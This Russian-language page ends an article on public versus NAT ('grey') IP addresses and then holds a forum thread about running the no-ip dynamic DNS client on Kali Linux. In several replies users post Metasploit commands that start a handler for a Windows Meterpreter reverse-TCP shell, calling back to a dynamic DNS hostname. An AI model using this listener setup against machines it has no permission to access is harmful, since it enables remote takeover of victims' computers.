Шаг 4. Щелкнуть по закладке «Status» и в разделе «WAN» прочитать «IP Address».

Белый IP

Щелкаем по закладке «Status» и в разделе «WAN» читаем «IP Address»

Сверить этот IP-адрес с приведенным выше списком IP-адресов, выделенным для частных сетей. Если цифры IP-адреса попадают в указанный диапазон, то этот адрес является серым, если нет, то белым.

Справка! Если информации об IP-адресе нет в закладке «Status», она может находиться в разделе «Network» – «WAN» или в любом другом меню роутера.

Кстати, узнать, через какой IP-адрес провайдера пользователь выходит в Интернет с серого IP, можно с помощью специального сервиса, перейдя по ссылке: https://whoer.net/ru.

Белый IP

В поле поиска вставляем ссылку на сайт, нажимаем «Enter»

Слева в графе «My IP» будет указан IP-адрес. В данном случае это: 108.62.18.138.

Белый IP

Слева в графе «My IP» указан IP-адрес

Как сделать или получить белый IP у провайдера?

В настоящее время, чтобы гарантированно получить белый IP-адрес, необходимо приобрести его у своего провайдера. Стоимость белого IP у всех провайдеров различная и не слишком высока: 100-150 р. в месяц. Существуют и бесплатные варианты подключения.

Для получения белого IP-адреса необходимо зайти на сайт провайдера и посмотреть его стоимость в тарифах, затем скачать специальную настройку или позвонить оператору. В большинстве случаев провайдер предложит подключение по PPPoE или VPN (L2TP, PPTP).

Видео — Белый и серый IP адреса

kot-gor


  • #1

Всем привет, часто в ветке форума встречаю, что делать если у меня нет белого ip? Один из вариантов это использовать сервис no-ip.Сейчас я постараюсь подробно рассказать как можно его установить в среде всеми нами любимого kali, и так поехали!!
Самое первое это заходим по адресу

Ссылка скрыта от гостей

проходим регистрацию.
далее на этом же сайте скачиваем клиент.

Снимок экрана от 2016-11-16 21-16-22.png

после того как скачали,копируем в удобное место, распаковываем, и переходим в директорию с распакованным пакетом.

Снимок экрана от 2016-11-16 21-24-04.jpg

Далее командой make install запускаем установку данного пакета.

в процессе указываем свой почтовый ящик,который вводили при регистрации no-ip.
пароль,а также выбираем интервал обновления,я выбрал 5 минут. по умолчанию 30.
Так же у нас спросят Do you wish to run something at successful update?[N] (y/N) — Нажмите «y» чтобы обновить хост сейчас.

Снимок экрана от 2016-11-16 21-26-37.jpg

Запускается no-ip командой командой no-ip2

Снимок экрана от 2016-11-16 21-27-39.png

Вот и все, как видите ничего сложно.всем спасибо за внимания и удачи.

MAdDog719


  • #2

Обязательно попробую. Спасибо

m0tion


  • #3

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.

kot-gor


  • #4

Можно устанавливать не обязательно на Linux. Я например на роутере(Mikrotik) скрипт поставил.

да конечно, здесь я описал один из вариантов..

Vander


  • #5

Наконец-то, кто то это описал)) Все никак руки не доходили. Спасибо за статью.

fvn


  • #6

Может стоит изменить название на «что делать если ip динамический». В случае серых адресов No-Ip не поможет.

kot-gor


  • #7

Может стоит изменить название на «что делать если ip динамический». В случае серых адресов No-Ip не поможет.

Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168…. после NAT, адрес самого роутера в сети 10.10….(что и есть серый). Все прекрасно работает!:)

Последнее редактирование: 17.11.2016

MAdDog719


  • #8

Что такое не везет

3b7a846a1db4.jpg

И как с этим бороться?

kot-gor


  • #9

возможно с паролем или логином ошиблись

MAdDog719


  • #10

возможно, вечером буду дома попробую еще раз.

<~DarkNode~>


  • #11

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

2016_11_17_162410_1023x579_scrot.jpg

kot-gor


  • #12

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

2016_11_17_162410_1023x579_scrot.jpg

И не забыть пробросить нужные порты в роутере .

m0tion


  • #13

Хотел дополнить ,что если через No-IP юзаем метасплоит , то стоит заметить что в метасплоите в качестве LHOST нужно указывать dns имя выданое нам сервисом(hostname) и параметром
REVERSELISTENERBINDADDRESS указывать свой локальный IP
Примерно такой список вводимых команд

Код:

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST daraknode.ddns.net
set REVERSELISTENERBINDADDRESS 192.168.1.200
exploit -j

2016_11_17_162410_1023x579_scrot.jpg

У меня всё проще. Достаточно указать LHOST = IP машины с msf и пробросить порты в роутере

kot-gor


  • #14

у вас белый статический ip, у многих такое отсутствует…

Последнее редактирование: 17.11.2016

DoberGroup


  • #15

Вы уверены в своем утверждении? Как раз в этом примере что я показывал, no-ip стоит на машине с адресом 192.168…. после NAT, адрес самого роутера в сети 10.10….(что и есть серый). Все прекрасно работает!:)

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет

kot-gor


  • #16

А как Вы через провайдерский NAT, простите, порты пробрасываете? DDNS это ведь не самоцель, это вспомогательный инструмет

Я пробрасываю порты только на своем роутере.

DoberGroup


  • #17

Я пробрасываю порты только на своем роутере.

А смысл?
Вы пишете, что внешний адрес у Вас 10.х.х.х, не маршрутизируемый
Значит — Вы за провайдерским NAT (кстати, каким? Конусным, симметричным, порт-/адрес-определяемым?)
Что Вам даст проброс портов на роутере, их все равно из внешнего мира не будет видно?

kot-gor


  • #18

я не смотрел топологию провайдера..хотя интерес вы подогрели,нужно на досуге глянуть.

Ishikawa


  • #19

Немного теории

Cone NAT

Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Любой пакет с внешнего хоста, посланный на адрес 1.1.1.2:8801 будет отправлен на 192.168.0.2:2210

nattypescone.png

Full cone nat

Address-Restricted cone NAT или Restricted cone NAT.
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Пакет с любого порта внешнего хоста, посланный на адрес 1.1.1.2:8801 будет отправлен на 192.168.0.2:2210 только в случае, если 192.168.0.2:2210 предварительно посылал пакет на этот внешний хост.

nattypesrestrictedcone.png

Port-Restricted cone NAT
Внутренний адрес (192.168.0.2:2210) проецируются на внешний адрес (1.1.1.2:8801). Любой пакет посланный с 192.168.0.2:2210 будет послан через 1.1.1.2:8801. Внешний хост (1.1.1.30:1234) может послать пакет на 192.168.0.2:2210 через 1.1.1.2:8801 только в случае если ранее 192.168.0.2:2210 слал пакет на 1.1.1.30:1234

nattypesportrestrictedcone.png

Symmetric NAT
Каждый пакет с определенного внутреннего IP адреса:порта на определенный внешний IP адрес:порт будет иметь после трансляции уникальный внешний адрес порт. Соответственно, пакет с одного и того-же внутреннего адреса:порта, но посланный на другой внешний хост или порт после трансляции будет иметь другой внешний адрес-порт. Внешние хосты могут послать обратный пакет только на те хосты:порты откуда они получили пакеты.

nattypessymmetric.png

kot-gor


  • #20

Спасибо, очень подробный мануал.

Понравилась статья? Поделить с друзьями:
  • Сертификат этой организации отозван как исправить ie 11
  • Сетевой адаптер сетевой мост не имеет допустимых параметров настройки ip как исправить
  • Сертификат сервера не соответствует адресу сайта как исправить
  • Сетевой адаптер не имеет допустимых параметров не исправлено настройки ip как исправить ethernet
  • Сертификат проверки электронной подписи не пригоден для шифрования код ошибки 06100125